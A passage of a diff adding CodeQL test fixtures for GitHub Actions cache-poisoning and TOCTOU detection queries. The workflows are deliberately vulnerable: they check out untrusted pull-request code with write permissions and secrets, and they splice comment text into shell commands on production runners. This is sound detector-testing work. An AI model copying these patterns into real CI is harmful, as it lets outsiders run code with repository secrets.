cache-pip | .github/workflows/neg_direct_cache3.yml:25:9:30:6 | Uses Step | +| .github/workflows/neg_direct_cache3.yml:25:9:30:6 | Uses Step | .github/workflows/neg_direct_cache3.yml:30:9:35:36 | Uses Step | +| .github/workflows/neg_direct_cache4.yml:10:9:13:6 | Uses Step: comment-branch | .github/workflows/neg_direct_cache4.yml:13:9:18:6 | Uses Step | +| .github/workflows/neg_direct_cache4.yml:13:9:18:6 | Uses Step | .github/workflows/neg_direct_cache4.yml:18:9:22:6 | Uses Step | +| .github/workflows/neg_direct_cache4.yml:18:9:22:6 | Uses Step | .github/workflows/neg_direct_cache4.yml:22:9:23:21 | Run Step | +| .github/workflows/neg_direct_cache5.yml:10:9:13:6 | Uses Step: comment-branch | .github/workflows/neg_direct_cache5.yml:13:9:18:6 | Uses Step | +| .github/workflows/neg_direct_cache5.yml:13:9:18:6 | Uses Step | .github/workflows/neg_direct_cache5.yml:18:9:22:6 | Uses Step | +| .github/workflows/neg_direct_cache5.yml:18:9:22:6 | Uses Step | .github/workflows/neg_direct_cache5.yml:22:9:23:21 | Run Step | +| .github/workflows/neg_poisonable_step1.yml:11:9:14:6 | Uses Step: comment-branch | .github/workflows/neg_poisonable_step1.yml:14:9:19:6 | Uses Step | +| .github/workflows/neg_poisonable_step1.yml:14:9:19:6 | Uses Step | .github/workflows/neg_poisonable_step1.yml:19:9:20:30 | Run Step | +| .github/workflows/neg_poisonable_step2.yml:13:9:16:6 | Uses Step | .github/workflows/neg_poisonable_step2.yml:16:9:17:54 | Run Step | +| .github/workflows/poisonable_step1.yml:10:9:12:6 | Uses Step: comment-branch | .github/workflows/poisonable_step1.yml:12:9:15:6 | Uses Step | +| .github/workflows/poisonable_step1.yml:12:9:15:6 | Uses Step | .github/workflows/poisonable_step1.yml:15:9:17:2 | Run Step | +| .github/workflows/poisonable_step1.yml:21:9:23:6 | Uses Step: comment-branch | .github/workflows/poisonable_step1.yml:23:9:26:6 | Uses Step | +| .github/workflows/poisonable_step1.yml:23:9:26:6 | Uses Step | .github/workflows/poisonable_step1.yml:26:9:28:2 | Uses Step | +| .github/workflows/poisonable_step1.yml:32:9:34:6 | Uses Step: comment-branch | .github/workflows/poisonable_step1.yml:34:9:37:6 | Uses Step | +| .github/workflows/poisonable_step1.yml:34:9:37:6 | Uses Step | .github/workflows/poisonable_step1.yml:37:9:37:75 | Run Step | +| .github/workflows/poisonable_step2.yml:15:9:20:6 | Uses Step | .github/workflows/poisonable_step2.yml:20:9:22:6 | Uses Step | +| .github/workflows/poisonable_step2.yml:20:9:22:6 | Uses Step | .github/workflows/poisonable_step2.yml:22:9:26:31 | Uses Step | +| .github/workflows/poisonable_step3.yml:13:7:19:4 | Uses Step | .github/workflows/poisonable_step3.yml:19:7:19:32 | Run Step | +| .github/workflows/poisonable_step4.yml:13:9:18:6 | Uses Step | .github/workflows/poisonable_step4.yml:18:9:18:19 | Run Step | +| .github/workflows/poisonable_step5.yml:17:9:22:6 | Uses Step | .github/workflows/poisonable_step5.yml:22:9:24:6 | Uses Step | +| .github/workflows/poisonable_step5.yml:22:9:24:6 | Uses Step | .github/workflows/poisonable_step5.yml:24:9:28:31 | Uses Step | +#select +| .github/workflows/poisonable_step1.yml:15:9:17:2 | Run Step | .github/workflows/poisonable_step1.yml:12:9:15:6 | Uses Step | .github/workflows/poisonable_step1.yml:15:9:17:2 | Run Step | Potential cache poisoning in the context of the default branch due to privilege checkout of untrusted code. ($@). | .github/workflows/poisonable_step1.yml:2:3:2:15 | issue_comment | issue_comment | +| .github/workflows/poisonable_step1.yml:26:9:28:2 | Uses Step | .github/workflows/poisonable_step1.yml:23:9:26:6 | Uses Step | .github/workflows/poisonable_step1.yml:26:9:28:2 | Uses Step | Potential cache poisoning in the context of the default branch due to privilege checkout of untrusted code. ($@). | .github/workflows/poisonable_step1.yml:2:3:2:15 | issue_comment | issue_comment | +| .github/workflows/poisonable_step1.yml:37:9:37:75 | Run Step | .github/workflows/poisonable_step1.yml:34:9:37:6 | Uses Step | .github/workflows/poisonable_step1.yml:37:9:37:75 | Run Step | Potential cache poisoning in the context of the default branch due to privilege checkout of untrusted code. ($@). | .github/workflows/poisonable_step1.yml:2:3:2:15 | issue_comment | issue_comment | +| .github/workflows/poisonable_step2.yml:22:9:26:31 | Uses Step | .github/workflows/poisonable_step2.yml:15:9:20:6 | Uses Step | .github/workflows/poisonable_step2.yml:22:9:26:31 | Uses Step | Potential cache poisoning in the context of the default branch due to privilege checkout of untrusted code. ($@). | .github/workflows/poisonable_step2.yml:5:3:5:21 | pull_request_target | pull_request_target | +| .github/workflows/poisonable_step3.yml:19:7:19:32 | Run Step | .github/workflows/poisonable_step3.yml:13:7:19:4 | Uses Step | .github/workflows/poisonable_step3.yml:19:7:19:32 | Run Step | Potential cache poisoning in the context of the default branch due to privilege checkout of untrusted code. ($@). | .github/workflows/poisonable_step3.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/poisonable_step4.yml:18:9:18:19 | Run Step | .github/workflows/poisonable_step4.yml:13:9:18:6 | Uses Step | .github/workflows/poisonable_step4.yml:18:9:18:19 | Run Step | Potential cache poisoning in the context of the default branch due to privilege checkout of untrusted code. ($@). | .github/workflows/poisonable_step4.yml:3:3:3:21 | pull_request_target | pull_request_target | +| .github/workflows/poisonable_step5.yml:24:9:28:31 | Uses Step | .github/workflows/poisonable_step5.yml:17:9:22:6 | Uses Step | .github/workflows/poisonable_step5.yml:24:9:28:31 | Uses Step | Potential cache poisoning in the context of the default branch due to privilege checkout of untrusted code. ($@). | .github/workflows/poisonable_step5.yml:3:3:3:21 | pull_request_target | pull_request_target | diff --git a/actions/ql/test/query-tests/Security/CWE-349/CachePoisoningViaPoisonableStep.qlref b/actions/ql/test/query-tests/Security/CWE-349/CachePoisoningViaPoisonableStep.qlref new file mode 100644 index 000000000000..89db21d70f59 --- /dev/null +++ b/actions/ql/test/query-tests/Security/CWE-349/CachePoisoningViaPoisonableStep.qlref @@ -0,0 +1,2 @@ +Security/CWE-349/CachePoisoningViaPoisonableStep.ql + diff --git a/actions/ql/test/query-tests/Security/CWE-367/.github/workflows/actor.yml b/actions/ql/test/query-tests/Security/CWE-367/.github/workflows/actor.yml new file mode 100644 index 000000000000..0913ac8bbcfc --- /dev/null +++ b/actions/ql/test/query-tests/Security/CWE-367/.github/workflows/actor.yml @@ -0,0 +1,21 @@ +name: Actor + +on: pull_request + +permissions: + contents: write + +jobs: + template-oss: + name: test + if: github.repository_owner == 'npm' && github.actor == 'dependabot[bot]' + runs-on: ubuntu-latest + defaults: + run: + shell: bash + steps: + - uses: actions/checkout@v4 + with: + ref: ${{ github.event.pull_request.head.ref }} + - run: | + ./cmd diff --git a/actions/ql/test/query-tests/Security/CWE-367/.github/workflows/comment.yml b/actions/ql/test/query-tests/Security/CWE-367/.github/workflows/comment.yml new file mode 100644 index 000000000000..a4acd7387660 --- /dev/null +++ b/actions/ql/test/query-tests/Security/CWE-367/.github/workflows/comment.yml @@ -0,0 +1,68 @@ +# https://github.com/AdnaneKhan/ActionsTOCTOU/blob/main/.github/workflows/comment_victim.yml +name: Comment Triggered Test +on: + issue_comment: + types: [created] +permissions: 'write-all' +jobs: + test1: + if: ${{ github.event.issue.pull_request && contains(fromJson('["MEMBER", "OWNER"]'), github.event.comment.author_association) && startsWith(github.event.comment.body, '/run-tests ') }} + runs-on: ubuntu-latest + steps: + + - uses: actions/github-script@v6 + name: Get PR branch + id: issue + with: + script: | + const pr = context.payload.issue.number + const data = await github.rest.pulls.get({ + owner: context.repo.owner, + repo: context.repo.repo, + pull_number: pr + }) + return { + ref: data.data.head.ref, + sha: data.data.head.sha, + } + - uses: actions/checkout@v4 + with: + submodules: recursive + ref: ${{ fromJson(steps.issue.outputs.result).sha }} + - run: bash comment_example/tests.sh + + test2: + if: ${{ github.event.issue.pull_request && contains(fromJson('["MEMBER", "OWNER"]'), github.event.comment.author_association) && startsWith(github.event.comment.body, '/run-tests ') }} + runs-on: ubuntu-latest + steps: + + - uses: actions/github-script@v6 + name: Get PR branch + id: issue + with: + script: | + const pr = context.payload.issue.number + const data = await github.rest.pulls.get({ + owner: context.repo.owner, + repo: context.repo.repo, + pull_number: pr + }) + return { + ref: data.data.head.ref, + sha: data.data.head.sha, + } + - uses: actions/checkout@v4 + with: + submodules: recursive + ref: ${{ fromJson(steps.issue.outputs.result).ref }} + - run: bash comment_example/tests.sh + + test3: + if: ${{ github.event.issue.pull_request && contains(fromJson('["MEMBER", "OWNER"]'), github.event.comment.author_association) && startsWith(github.event.comment.body, '/run-tests ') }} + runs-on: ubuntu-latest + steps: + - uses: actions/checkout@v4 + with: + submodules: recursive + ref: "refs/pull/${{ github.event.number }}/merge" + - run: bash comment_example/tests.sh diff --git a/actions/ql/test/query-tests/Security/CWE-367/.github/workflows/deployment1.yml b/actions/ql/test/query-tests/Security/CWE-367/.github/workflows/deployment1.yml new file mode 100644 index 000000000000..f0a3035777c5 --- /dev/null +++ b/actions/ql/test/query-tests/Security/CWE-367/.github/workflows/deployment1.yml @@ -0,0 +1,31 @@ +# https://github.com/AdnaneKhan/ActionsTOCTOU/blob/main/.github/workflows/deployment_victim.yml +name: Environment PR Check + +on: + pull_request_target: + branches: + - main + paths: + - 'README.md' + workflow_dispatch: +jobs: + test: + environment: Public CI + runs-on: ubuntu-latest + steps: + - name: Checkout from PR branch + uses: actions/checkout@v4 + with: + repository: ${{ github.event.pull_request.head.repo.full_name }} + ref: ${{ github.event.pull_request.head.ref }} + + - name: Set Node.js 20.x for GitHub Action + uses: actions/setup-node@v4 + with: + node-version: 20.x + + - name: installing node_modules + run: cd deployment_example && npm install + + - name: Build GitHub Action + run: cd deployment_example && npm run build diff --git a/actions/ql/test/query-tests/Security/CWE-367/.github/workflows/deployment2.yml b/actions/ql/test/query-tests/Security/CWE-367/.github/workflows/deployment2.yml new file mode 100644 index 000000000000..5c6e28eafc8d --- /dev/null +++ b/actions/ql/test/query-tests/Security/CWE-367/.github/workflows/deployment2.yml @@ -0,0 +1,31 @@ +# https://github.com/AdnaneKhan/ActionsTOCTOU/blob/main/.github/workflows/deployment_victim.yml +name: Environment PR Check + +on: + pull_request_target: + branches: + - main + paths: + - 'README.md' + workflow_dispatch: +jobs: + test: + environment: Public CI + runs-on: ubuntu-latest + steps: + - name: Checkout from PR branch + uses: actions/checkout@v4 + with: + repository: ${{ github.event.pull_request.head.repo.full_name }} + ref: ${{ github.event.pull_request.head.sha }} + + - name: Set Node.js 20.x for GitHub Action + uses: actions/setup-node@v4 + with: + node-version: 20.x + + - name: installing node_modules + run: cd deployment_example && npm install + + - name: Build GitHub Action + run: cd deployment_example && npm run build diff --git a/actions/ql/test/query-tests/Security/CWE-367/.github/workflows/label.yml b/actions/ql/test/query-tests/Security/CWE-367/.github/workflows/label.yml new file mode 100644 index 000000000000..1f04440d28bb --- /dev/null +++ b/actions/ql/test/query-tests/Security/CWE-367/.github/workflows/label.yml @@ -0,0 +1,17 @@ +# https://github.com/AdnaneKhan/ActionsTOCTOU/blob/main/.github/workflows/label_victim.yml +name: Label Trigger Test +on: + pull_request_target: + types: [labeled] + branches: [main] + +jobs: + integration-tests: + runs-on: ubuntu-latest + if: contains(github.event.pull_request.labels.*.name, 'safe-to-test') + steps: + - uses: actions/checkout@v4 + with: + ref: ${{ github.event.pull_request.head.ref }} + repository: ${{ github.event.pull_request.head.repo.full_name }} + - run: bash label_example/tests.sh diff --git a/actions/ql/test/query-tests/Security/CWE-367/.github/workflows/label_actor.yml b/actions/ql/test/query-tests/Security/CWE-367/.github/workflows/label_actor.yml new file mode 100644 index 000000000000..1debaecf97d3 --- /dev/null +++ b/actions/ql/test/query-tests/Security/CWE-367/.github/workflows/label_actor.yml @@ -0,0 +1,17 @@ +# Making Label gates the only ones bypassable with TOCTOU races since actor or association ones should not be bypassable +name: Label Trigger Test +on: + pull_request_target: + types: [labeled] + branches: [main] + +jobs: + integration-tests: + runs-on: ubuntu-latest + if: github.repository_owner == 'npm' && github.actor == 'dependabot[bot]' + steps: + - uses: actions/checkout@v4 + with: + ref: ${{ github.event.pull_request.head.ref }} + repository: ${{ github.event.pull_request.head.repo.full_name }} + - run: bash label_example/tests.sh diff --git a/actions/ql/test/query-tests/Security/CWE-367/.github/workflows/test0.yml b/actions/ql/test/query-tests/Security/CWE-367/.github/workflows/test0.yml new file mode 100644 index 000000000000..a4acd7387660 --- /dev/null +++ b/actions/ql/test/query-tests/Security/CWE-367/.github/workflows/test0.yml @@ -0,0 +1,68 @@ +# https://github.com/AdnaneKhan/ActionsTOCTOU/blob/main/.github/workflows/comment_victim.yml +name: Comment Triggered Test +on: + issue_comment: + types: [created] +permissions: 'write-all' +jobs: + test1: + if: ${{ github.event.issue.pull_request && contains(fromJson('["MEMBER", "OWNER"]'), github.event.comment.author_association) && startsWith(github.event.comment.body, '/run-tests ') }} + runs-on: ubuntu-latest + steps: + + - uses: actions/github-script@v6 + name: Get PR branch + id: issue + with: + script: | + const pr = context.payload.issue.number + const data = await github.rest.pulls.get({ + owner: context.repo.owner, + repo: context.repo.repo, + pull_number: pr + }) + return { + ref: data.data.head.ref, + sha: data.data.head.sha, + } + - uses: actions/checkout@v4 + with: + submodules: recursive + ref: ${{ fromJson(steps.issue.outputs.result).sha }} + - run: bash comment_example/tests.sh + + test2: + if: ${{ github.event.issue.pull_request && contains(fromJson('["MEMBER", "OWNER"]'), github.event.comment.author_association) && startsWith(github.event.comment.body, '/run-tests ') }} + runs-on: ubuntu-latest + steps: + + - uses: actions/github-script@v6 + name: Get PR branch + id: issue + with: + script: | + const pr = context.payload.issue.number + const data = await github.rest.pulls.get({ + owner: context.repo.owner, + repo: context.repo.repo, + pull_number: pr + }) + return { + ref: data.data.head.ref, + sha: data.data.head.sha, + } + - uses: actions/checkout@v4 + with: + submodules: recursive + ref: ${{ fromJson(steps.issue.outputs.result).ref }} + - run: bash comment_example/tests.sh + + test3: + if: ${{ github.event.issue.pull_request && contains(fromJson('["MEMBER", "OWNER"]'), github.event.comment.author_association) && startsWith(github.event.comment.body, '/run-tests ') }} + runs-on: ubuntu-latest + steps: + - uses: actions/checkout@v4 + with: + submodules: recursive + ref: "refs/pull/${{ github.event.number }}/merge" + - run: bash comment_example/tests.sh diff --git a/actions/ql/test/query-tests/Security/CWE-367/.github/workflows/test1.yml b/actions/ql/test/query-tests/Security/CWE-367/.github/workflows/test1.yml new file mode 100644 index 000000000000..878b83779613 --- /dev/null +++ b/actions/ql/test/query-tests/Security/CWE-367/.github/workflows/test1.yml @@ -0,0 +1,96 @@ +name: Test + +on: + + issue_comment: + types: [created] + +jobs: + + deploy: + name: Update deployment + if: > + github.event.issue.pull_request && + (contains(github.event.comment.body, '/deploy') || contains(github.event.comment.body, '/rollback')) && + contains(github.event.issue.labels.*.name, 'Deployment Update') && + github.event.comment.user.type != 'Bot' && + ( + github.event.issue.author_association == 'OWNER' || + github.event.issue.author_association == 'COLLABORATOR' || + github.event.issue.author_association == 'MEMBER' + ) + runs-on: [self-hosted, production] + + permissions: + contents: write + issues: write + pull-requests: write + statuses: write + + steps: + + - name: Check comment keywords + shell: bash + env: + COMMENT_BODY: ${{ github.event.comment.body }} + PR_COMMENT_ALLOW_LIST: ${{ secrets.PR_COMMENT_ALLOW_LIST }} + run: | + function list_subset { local list1="$1"; local list2="$2"; result=0; for item in $list2; do if ! [[ $list1 =~ (^|[[:space:]])"$item"($|[[:space:]]) ]]; then result=1; fi; done; return $result; } + + if `list_subset "echo $PR_COMMENT_ALLOW_LIST" "echo $COMMENT_BODY"` ; then + echo "Command keywords allowed. Proceeding!" + else + echo "Command keywords not allowed. Skipping!" + exit 1 + fi + + - name: Get environment from comment + id: environment + shell: bash + env: + COMMENT_BODY: ${{ github.event.comment.body }} + COMMENT_AT: ${{ github.event.comment.created_at }} + GH_REPO: ${{ github.repository }} + PR_NUMBER: ${{ github.event.issue.number }} + GH_TOKEN: ${{ secrets.GITHUB_TOKEN }} + run: | + pr="$(gh api /repos/${GH_REPO}/pulls/${PR_NUMBER})" + head_sha="$(echo "$pr" | jq -r .head.sha)" + pushed_at="$(echo "$pr" | jq -r .pushed_at)" + + if [[ $(date -d "$pushed_at" +%s) -gt $(date -d "$COMMENT_AT" +%s) ]]; then + echo "Deployment not allowed because the PR was pushed to (at $pushed_at) after the triggering comment was issued (at $COMMENT_AT)" + exit 1 + fi + + target=$(echo "$COMMENT_BODY" | sed 's/.* //') && \ + deploy_type=$(echo "$COMMENT_BODY" | sed 's/ .*//') + + if [[ $target == "scorer" ]]; then + echo "env=async scorer" >> $GITHUB_OUTPUT + else + env=$(echo "$target") + echo "env=$env" >> $GITHUB_OUTPUT + fi + + if [[ $deploy_type == "/deploy" ]]; then + echo "depl=deployment" >> $GITHUB_OUTPUT + elif [[ $deploy_type == "/rollback" ]]; then + echo "depl=rollback" >> $GITHUB_OUTPUT + else + echo "depl=unknown deployment type" >> $GITHUB_OUTPUT + fi + + echo "head_sha=$head_sha" >> $GITHUB_OUTPUT + + - name: Checkout PR branch + if: contains(github.event.comment.body, '/deploy') + uses: actions/checkout@692973e3d937129bcbf40652eb9f2f61becf3332 # v4 + with: + ref: ${{ steps.environment.outputs.head_sha }} + + - name: Environment setup + uses: ./.github/actions/setup-env + with: + azure_creds: ${{ secrets.AZURE_CREDENTIALS }} + diff --git a/actions/ql/test/query-tests/Security/CWE-367/.github/workflows/test2.yml b/actions/ql/test/query-tests/Security/CWE-367/.github/workflows/test2.yml new file mode 100644 index 000000000000..6f03a0e966a1 --- /dev/null +++ b/actions/ql/test/query-tests/Security/CWE-367/.github/workflows/test2.yml @@ -0,0 +1,227 @@ +name: Autodeploy Model to AML + +on: + + issue_comment: + types: [created] + +jobs: + + security-checks: + + name: Carry out security checks + if: >- + ${{ + github.event.issue.pull_request && + (contains(github.event.comment.body, '/deploy') || contains(github.event.comment.body, '/rollback')) && + contains(github.event.issue.labels.*.name, 'Deployment Update') && + github.event.comment.user.type != 'Bot' && + github.event.pull_request.author_association != 'FIRST_TIMER' && + github.event.pull_request.author_association != 'FIRST_TIME_CONTRIBUTOR' && + github.event.pull_request.author_association != 'MANNEQUIN' && + github.event.pull_request.author_association != 'NONE' + }} + + runs-on: ubuntu-latest + + defaults: + run: + shell: bash + + permissions: + contents: write + issues: write + pull-requests: write + + steps: + + - name: Install GH CLI + uses: dev-hanz-ops/install-gh-cli-action@8fff9050dae2d81b38f94500d8b74ad1d1d47410 #v0.2.0 + + - name: Install jq + run: sudo apt-get update && sudo apt-get install -y jq + + - name: Check comment keywords + env: + COMMENT_BODY: ${{ github.event.comment.body }} + PR_COMMENT_ALLOW_LIST: ${{ secrets.PR_COMMENT_ALLOW_LIST }} + run: | + function list_subset { local list1="$1"; local list2="$2"; result=0; for item in $list2; do if ! [[ $list1 =~ (^|[[:space:]])"$item"($|[[:space:]]) ]]; then result=1; fi; done; return $result; } + + if `list_subset "echo $PR_COMMENT_ALLOW_LIST" "echo $COMMENT_BODY"` ; then + echo "Command keywords allowed. Proceeding!" + else + echo "Command keywords not allowed. Skipping!" + exit 1 + fi + + - name: Check for conflicting pushes + id: environment + shell: bash + env: + COMMENT_BODY: ${{ github.event.comment.body }} + COMMENT_AT: ${{ github.event.comment.created_at }} + GH_REPO: ${{ github.repository }} + PR_NUMBER: ${{ github.event.issue.number }} + GH_TOKEN: ${{ secrets.GITHUB_TOKEN }} + run: | + pr="$(gh api /repos/${GH_REPO}/pulls/${PR_NUMBER})" + pushed_at="$(echo "$pr" | jq -r .pushed_at)" + + if [[ $(date -d "$pushed_at" +%s) -gt $(date -d "$COMMENT_AT" +%s) ]]; then + echo "Deployment not allowed because the PR was pushed to (at $pushed_at) after the triggering comment was issued (at $COMMENT_AT)" + exit 1 + fi + + deploy: + + name: Update deployment + needs: security-checks + runs-on: [self-hosted, production] + + permissions: + contents: write + issues: write + pull-requests: write + statuses: write + + steps: + + - name: Get PR branch + uses: xt0rted/pull-request-comment-branch@d97294d304604fa98a2600a6e2f916a84b596dc7 # v2.0.0 + id: comment-branch + + - name: Set latest commit status as pending + uses: myrotvorets/set-commit-status-action@3730c0a348a2ace3c110851bed53331bc6406e9f # v2.0.1 + with: + sha: ${{ steps.comment-branch.outputs.head_sha }} + token: ${{ secrets.GITHUB_TOKEN }} + status: pending + + - name: Checkout main + if: contains(github.event.comment.body, '/rollback') + uses: actions/checkout@692973e3d937129bcbf40652eb9f2f61becf3332 # v4 + + - name: Checkout PR branch + if: contains(github.event.comment.body, '/deploy') + uses: actions/checkout@692973e3d937129bcbf40652eb9f2f61becf3332 # v4 + with: + ref: ${{ steps.comment-branch.outputs.head_ref }} + + - name: Get environment from comment + id: environment + shell: bash + env: + COMMENT_BODY: ${{ github.event.comment.body }} + run: | + target=$(echo "$COMMENT_BODY" | sed 's/.* //') && \ + deploy_type=$(echo "$COMMENT_BODY" | sed 's/ .*//') + + if [[ $target == "scorer" ]]; then + echo "env=async scorer" >> $GITHUB_OUTPUT + else + env=$(echo "$target") + echo "env=$env" >> $GITHUB_OUTPUT + fi + + if [[ $deploy_type == "/deploy" ]]; then + echo "depl=deployment" >> $GITHUB_OUTPUT + elif [[ $deploy_type == "/rollback" ]]; then + echo "depl=rollback" >> $GITHUB_OUTPUT + else + echo "depl=unknown deployment type" >> $GITHUB_OUTPUT + fi + + - name: Get email of actor + id: email + run: | + email="${{ github.actor }}@github.com" + echo "email=$email" >> $GITHUB_OUTPUT + + - name: Lookup Slack ID + id: slack-id + env: + SLACK_BOT_TOKEN: ${{ secrets.SLACK_BOT_TOKEN }} + run: | + slack_id=$(curl -s -H "Authorization: Bearer $SLACK_BOT_TOKEN" "https://slack.com/api/users.lookupByEmail?email=${{ steps.email.outputs.email }}" | jq -r '.user.id') + echo "slack-id=$slack_id" >> $GITHUB_OUTPUT + + - name: Notify deployment start in slack + id: slack-initiate + uses: slackapi/slack-github-action@37ebaef184d7626c5f204ab8d3baff4262dd30f0 # v1.27.0 + with: + channel-id: 'C05N5U3HH2M' # platform-health-ml-ops + payload: | + { + "blocks": [ + { + "type": "section", + "text": { + "type": "mrkdwn", + "text": "<@${{ steps.slack-id.outputs.slack-id }}>'s ${{ steps.environment.outputs.depl }} of <${{ github.event.issue.html_url }}|${{ github.event.issue.title }} #${{ github.event.issue.number }}> to ${{ steps.environment.outputs.env }} is in progress..." + } + } + ] + } + env: + SLACK_BOT_TOKEN: ${{ secrets.SLACK_BOT_TOKEN }} + + - name: Environment setup + uses: ./.github/actions/setup-env + with: + azure_creds: ${{ secrets.AZURE_CREDENTIALS }} + + - name: Deploy server + if: >- + ${{ + (contains(github.event.comment.body, '/deploy to') || + contains(github.event.comment.body, '/rollback')) && + !contains(github.event.comment.body, 'scorer') + }} + env: + BOT_TOKEN: ${{ secrets.GITHUB_TOKEN }} + PR_NUMBER: ${{ github.event.issue.number }} + COMMENT_BODY: ${{ github.event.comment.body }} + run: poetry run python server.py --endpoint_location=remote --autodeploy=True + + - name: Deploy scorer + if: >- + ${{ + contains(github.event.comment.body, '/deploy as async scorer') || + contains(github.event.comment.body, '/rollback async scorer') + }} + env: + BOT_TOKEN: ${{ secrets.GITHUB_TOKEN }} + PR_NUMBER: ${{ github.event.issue.number }} + run: poetry run python scorer.py --as_pipeline=True --schedule=True --autodeploy=True + + - name: Set latest commit status as ${{ job.status }} + uses: myrotvorets/set-commit-status-action@3730c0a348a2ace3c110851bed53331bc6406e9f # v2.0.1 + if: always() + with: + sha: ${{ steps.comment-branch.outputs.head_sha }} + token: ${{ secrets.GITHUB_TOKEN }} + status: ${{ job.status }} + + - name: Report deployment outcome in slack + uses: slackapi/slack-github-action@37ebaef184d7626c5f204ab8d3baff4262dd30f0 # v1.27.0 + if: always() + with: + channel-id: 'C05N5U3HH2M' # platform-health-ml-ops + payload: | + { + "blocks": [ + { + "type": "section", + "text": { + "type": "mrkdwn", + "text": "<@${{ steps.slack-id.outputs.slack-id }}>'s ${{ steps.environment.outputs.depl }} of <${{ github.event.issue.html_url }}|${{ github.event.issue.title }} #${{ github.event.issue.number }}> to ${{ steps.environment.outputs.env }} is complete!\n*Status: ${{ job.status }}*" + } + } + ] + } + env: + SLACK_BOT_TOKEN: ${{ secrets.SLACK_BOT_TOKEN }} + + - name: prune docker images + run: docker system prune --all --force diff --git a/actions/ql/test/query-tests/Security/CWE-367/.github/workflows/test3.yml b/actions/ql/test/query-tests/Security/CWE-367/.github/workflows/test3.yml new file mode 100644 index 000000000000..0be96a4140ef --- /dev/null +++ b/actions/ql/test/query-tests/Security/CWE-367/.github/workflows/test3.yml @@ -0,0 +1,271 @@ +name: Kickoff custom pipeline + +on: + + issue_comment: + types: [created] + +jobs: + + security-checks: + + name: Carry out security checks + if: >- + ${{ + github.event.issue.pull_request && + contains(github.event.comment.body, '/kickoff') && + contains(github.event.issue.labels.*.name, 'Pipeline Kickoff') && + github.event.comment.user.type != 'Bot' && + github.event.pull_request.author_association != 'FIRST_TIMER' && + github.event.pull_request.author_association != 'FIRST_TIME_CONTRIBUTOR' && + github.event.pull_request.author_association != 'MANNEQUIN' && + github.event.pull_request.author_association != 'NONE' + }} + + runs-on: ubuntu-latest + + defaults: + run: + shell: bash + + permissions: + contents: write + issues: write + pull-requests: write + + steps: + + - name: Check for conflicting pushes + id: environment + shell: bash + env: + COMMENT_BODY: ${{ github.event.comment.body }} + COMMENT_AT: ${{ github.event.comment.created_at }} + GH_REPO: ${{ github.repository }} + PR_NUMBER: ${{ github.event.issue.number }} + GH_TOKEN: ${{ secrets.GITHUB_TOKEN }} + run: | + pr="$(gh api /repos/${GH_REPO}/pulls/${PR_NUMBER})" + pushed_at="$(echo "$pr" | jq -r .pushed_at)" + + if [[ $(date -d "$pushed_at" +%s) -gt $(date -d "$COMMENT_AT" +%s) ]]; then + echo "Deployment not allowed because the PR was pushed to (at $pushed_at) after the triggering comment was issued (at $COMMENT_AT)" + exit 1 + fi + + - name: Get PR branch + uses: xt0rted/pull-request-comment-branch@d97294d304604fa98a2600a6e2f916a84b596dc7 # v2.0.0 + id: comment-branch + + - name: Checkout PR branch + uses: actions/checkout@692973e3d937129bcbf40652eb9f2f61becf3332 # v4 + with: + ref: ${{ steps.comment-branch.outputs.head_ref }} + + - name: Install GH CLI + uses: dev-hanz-ops/install-gh-cli-action@8fff9050dae2d81b38f94500d8b74ad1d1d47410 #v0.2.0 + + - name: Check comment keywords + env: + COMMENT_BODY: ${{ github.event.comment.body }} + PR_COMMENT_ALLOW_LIST: ${{ secrets.PR_COMMENT_ALLOW_LIST }} + run: | + function list_subset { local list1="$1"; local list2="$2"; result=0; for item in $list2; do if ! [[ $list1 =~ (^|[[:space:]])"$item"($|[[:space:]]) ]]; then result=1; fi; done; return $result; } + full_allowlist="$PR_COMMENT_ALLOW_LIST $(ls models)" + + if `list_subset "echo $full_allowlist" "echo $COMMENT_BODY"` ; then + echo "Command keywords allowed. Proceeding!" + else + echo "Command keywords not allowed. Skipping!" + exit 1 + fi + + docker-environment-creation: + + name: Build and push docker image + needs: security-checks + if: >- + ${{ + contains(github.event.comment.body, 'rebuild') && + contains(github.event.issue.labels.*.name, 'Pipeline Kickoff') && + needs.security-checks.result == 'success' + }} + runs-on: [self-hosted, production] + + permissions: + contents: write + + defaults: + run: + # Run bash like it came from an interactive login, to make it so that + # the .bashrc gets loaded. + shell: bash -l {0} + + steps: + + - name: Get PR branch + uses: xt0rted/pull-request-comment-branch@d97294d304604fa98a2600a6e2f916a84b596dc7 # v2 + id: comment-branch + + - name: Checkout PR branch + uses: actions/checkout@692973e3d937129bcbf40652eb9f2f61becf3332 # v4 + with: + ref: ${{ steps.comment-branch.outputs.head_ref }} + + - name: Log into Azure + uses: azure/login@a65d910e8af852a8061c627c456678983e180302 # @v2.2.0 + with: + creds: ${{ secrets.AZURE_CREDENTIALS }} + + - name: Container registry login + run: | + echo "Logging into $REGISTRY" + az acr login --name ${REGISTRY} + env: + REGISTRY: ${{ secrets.DOCKER_REGISTRY }} + + - name: Prune old images + run: | + docker system prune -a -f + + - name: Create image + run: | + model=$(echo "${{ github.event.comment.body }}" | sed 's/.*kickoff //' | sed 's/ .*//') + script/build_aml_image -m $model + + - name: Push image + run: | + model=$(echo "${{ github.event.comment.body }}" | sed 's/.*kickoff //' | sed 's/ .*//') + script/push_aml_image -m $model + + kickoff-pipeline: + + name: Kickoff pipeline + needs: [security-checks, docker-environment-creation] + if: >- + ${{ + always() && + needs.security-checks.result == 'success' && + needs.docker-environment-creation.result != 'failure' && + needs.docker-environment-creation.result != 'cancelled' + }} + + runs-on: [self-hosted, production] + + permissions: + contents: write + issues: write + pull-requests: write + statuses: write + + defaults: + run: + # Run bash like it came from an interactive login, to make it so that + # the .bashrc gets loaded. + shell: bash -l {0} + + steps: + + - name: Get PR branch + uses: xt0rted/pull-request-comment-branch@d97294d304604fa98a2600a6e2f916a84b596dc7 # v2 + id: comment-branch + + - name: Set latest commit status as pending + uses: myrotvorets/set-commit-status-action@3730c0a348a2ace3c110851bed53331bc6406e9f # v2.0.1 + with: + sha: ${{ steps.comment-branch.outputs.head_sha }} + token: ${{ secrets.GITHUB_TOKEN }} + status: pending + + - name: Checkout PR branch + uses: actions/checkout@v4 + with: + ref: ${{ steps.comment-branch.outputs.head_ref }} + + - name: Get pipeline info from comment + id: pipeline-info + run: | + model=$(echo "${{ github.event.comment.body }}" | sed 's/.*kickoff //' | sed 's/ .*//') && \ + scheduling=$(echo "${{ github.event.comment.body }}" | grep schedule | wc -l) && \ + echo "mdl=$model" >> $GITHUB_OUTPUT + if [[ $scheduling == 1 ]]; then + echo "schedule=True" >> $GITHUB_OUTPUT + else + echo "schedule=False" >> $GITHUB_OUTPUT + 